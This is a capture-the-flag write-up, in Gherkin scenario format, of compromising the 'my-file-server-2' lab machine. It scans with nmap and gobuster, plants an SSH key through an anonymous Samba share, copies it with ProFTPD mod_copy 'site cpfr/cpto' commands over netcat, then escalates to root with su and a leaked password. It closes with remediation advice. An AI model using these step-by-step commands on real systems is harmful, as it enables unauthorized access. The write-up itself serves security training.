## Version 1.4.1
## language: en

Feature:
  TOE:
    my-file-server-2
  Category:
    Insertion of Sensitive Information into Externally-Accessible File or
    Directory
  Location:
    192.168.10.5:2121 TCP
  CWE:
    CWE-552: Files or Directories Accessible to External Parties
  Rule:
    REQ.341: https://fluidattacks.com/products/rules/list/341
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Avoid that an user could upload or modify files inside the system
    directories

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | smbmap                     | 1.0.5    |
    | Gobuster                   | 3.0.1    |
    | Netcat                     | 1.10     |
    | Nmap                       | 7.91     |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on Virtualbox
    Then I saw that the machine was running CentOS Linux 7
    And it was requesting an user as it's shown in [evidence] (01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip addr show eth0
    """
    And I got the next output
    """
    eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UP group default qlen 1000
    link/ether 08:00:27:ab:08:1c brd ff:ff:ff:ff:ff:ff
    inet 192.168.10.3/24 brd 192.168.10.255 scope global dynamic noprefixroute
    eth0 valid_lft 577sec preferred_lft 577sec
    inet6 fe80::a00:27ff:feab:81c/64 scope link noprefixroute
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.10.0/24
    """
    And the command showed me the next result
    """
    Nmap scan report for 192.168.10.3
    Host is up (0.00097s latency).
    Nmap scan report for 192.168.10.5
    Host is up (0.0010s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.94 seconds
    """
    When I analyzed the previous commands output
    Then I knew that 192.168.10.5 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -sV 192.168.10.5
    """
    Then I got the next result
    """
    Nmap scan report for 192.168.10.5
    Host is up (0.0013s latency).
    Not shown: 908 filtered ports, 85 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 3.0.2
    22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
    80/tcp   open  http        Apache httpd 2.4.6 ((CentOS))
    111/tcp  open  rpcbind     2-4 (RPC #100000)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
    2049/tcp open  nfs_acl     3 (RPC #100227)
    2121/tcp open  ftp         ProFTPD 1.3.5
    Service Info: Host: FILESERVER; OS: Unix
    """
    When I appreciated the scan result
    Then I saw that the port 21 was running FTP in its version vsftpd 3.0.2
    And SSH was using version OpenSSH 7.4 on port 22
    And the port 80 was used by HTTP in its version apache 2.4.6
    And RCPBIND was using version 2-4 on port 111
    And the port 445 was used by NETBIOS-SSN in its version Samba smbd 3.X-4.X
    And NFS_ACL was used in its version 3 on port 2049
    And the port 2121 was used by FTP too with ProFTPD 1.3.5

  Scenario: Normal use case
    Given HTTP and FTP services were working on ports 80, 21 and 2121
    Then I accessed to them using the browser
    And thus I could see the webpage [evidence] (02.png)
    And public FTP files [evidence] (03.png)
    And FTP on port 2121 [evidence] (04.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't find any wrong on web service
    When I was analyzing it
    Then I scanned the server directories with gobuster using the next command
    """
    gobuster dir -u 192.168.10.5 -w /usr/share/SecLists/Discovery/
    Web-Content/raft-large-words.txt -x php,html,txt -s 200,204,301,302,307,401
    """
    Then I got the next output
    """
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.10.5
    [+] Threads:        10
    [+] Wordlist:       /usr/share/seclists/SecLists/Discovery/Web-Content
    /raft-large-words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,txt
    [+] Timeout:        10s
    ===============================================================
    2021/02/23 11:43:40 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /. (Status: 200)
    /readme.txt (Status: 200)
    ===============================================================
    2021/02/23 11:44:57 Finished
    ===============================================================
    """
    When I analyzed the results
    Then I tried to enter to readme.txt file
    And I found an interesting clue which seemed a password [evidence] (05.png)
    Then I did a scan using smbmap with the next command
    """
    smbmap -H 192.168.10.5
    """
    Then I got the next output
    """
    IP: 192.168.10.5:445        Name: unknown
    Disk           Permissions     Comment
    ----           -----------     -------
    print$         NO ACCESS       Printer Drivers
    smbdata        READ, WRITE     smbdata
    smbuser        NO ACCESS       smbuser
    IPC$           NO ACCESS       IPC Service (Samba 4.9.1)
    """
    When I analyzed the previous result
    Then I inferred that I could read and write smbdata
    And smbuser is an user
    Then I tried to log me through SSH with the password previously found
    Then I got an error due to public key [evidence] (06.png)
    Then I generated a SSH key locally using the next command
    """
    ssh-keygen -b 2048
    """
    Then I used smbclient to access to smbdata with the next command
    """
    smbclient //192.168.10.5/smbdata
    """
    Then I could log me anonymously
    And I executed the next command to access to samba directory
    """
    smb: \> cd samba\
    """
    Then I copied the public key previously generated with the next command
    """
    smb: \samba\> put /home/kali/.ssh/id_rsa.pub authorized_keys
    """
    Then I did a detailed scan on FTP ports using the command
    """
    nmap -p21 -A 192.168.10.5&&nmap -p2121 -A 192.168.10.5
    """
    Then I got the next result
    """
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.2
    ftp-anon: Anonymous FTP login allowed (FTP code 230)
    drwxrwxrwx    3 0        0 16 Feb 19  2020 pub [NSE: writeable]
    ftp-syst:
    STAT:
    FTP server status:
    Connected to ::ffff:192.168.10.3
    Logged in as ftp
    TYPE: ASCII
    No session bandwidth limit
    Session timeout in seconds is 300
    Control connection is plain text
    Data connections will be plain text
    At session startup, client count was 4
    vsFTPd 3.0.2 - secure, fast, stable
    End of status
    PORT     STATE SERVICE VERSION
    2121/tcp open  ftp     ProFTPD 1.3.5
    ftp-anon: Anonymous FTP login allowed (FTP code 230)
    Can't get directory listing: ERROR
    Service Info: OS: Unix
    """
    When I analyzed that output
    Then I noted that anonymous login is allowed on port twenty one
    Then I  accessed to FTP on port 21 using the next command
    """
    nc 192.168.10.5 21
    """
    Then I tried to execute the command
    """
    site cpfr /smbdata/samba/authorized_keys
    """
    And I received the next response
    """
    530 Please login with USER and PASS.
    """
    Then I used smbuser as user but the user wasn't authorized
    Then I used anonymous as user and password
    Then I got a successful login
    Then I tried the next command again
    """
    site cpfr /smbdata/samba/authorized_keys
    """
    Then I couldn't execute the command due to I didn't have enough permissions
    Then I accessed to FTP on port 2121 using the command
    """
    nc 192.168.10.5 2121
    """
    Then I tried the next command
    """
    site cpfr /smbdata/samba/authorized_keys
    """
    And finally it worked successful
    Then I executed the command
    """
    site cpto /root/.ssh/authorized_keys
    """
    And it didn't work due to I didn't have permissions in that directory
    Then I executed the next command
    """
    site cpto /home/smbuser/.ssh/authorized_keys
    """
    Then I copied the public key as an authorized key in smbuser directory

  Scenario: Exploitation
    Given I'd previously copied the public key as an authorized key
    Then I executed the next command to access through SSH to the target system
    """
    ssh smbuser@192.168.10.5
    """
    Then I got a successful login as it can see in [evidence] (07.png)
    Then I executed the command
    """
    su
    """
    And I used as a password a previous one found in a file on web server
    Then I got the root permissions
    Then I listed files on the root directory using the command
    """
    ls /root
    """
    Then I got the next result
    """
    proof.txt
    """
    Then I executed the next command to see the file found content
    """
    cat /root/proof.txt
    """
    And finally I solved the challenge as it can see in [evidence] (08.png)

  Scenario: Remediation
    Given the system allow upload files in the user directories
    And it's possible to find some clues about the passwords on the web server
    And management passwords are weak
    Then it'd better use the principle of deny by default
    And thus avoid that unauthorized users upload files in the system
    And avoid to put information about passwords on a public access
    And establish good password policies to have strong passwords

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.1/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.4/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-02-23
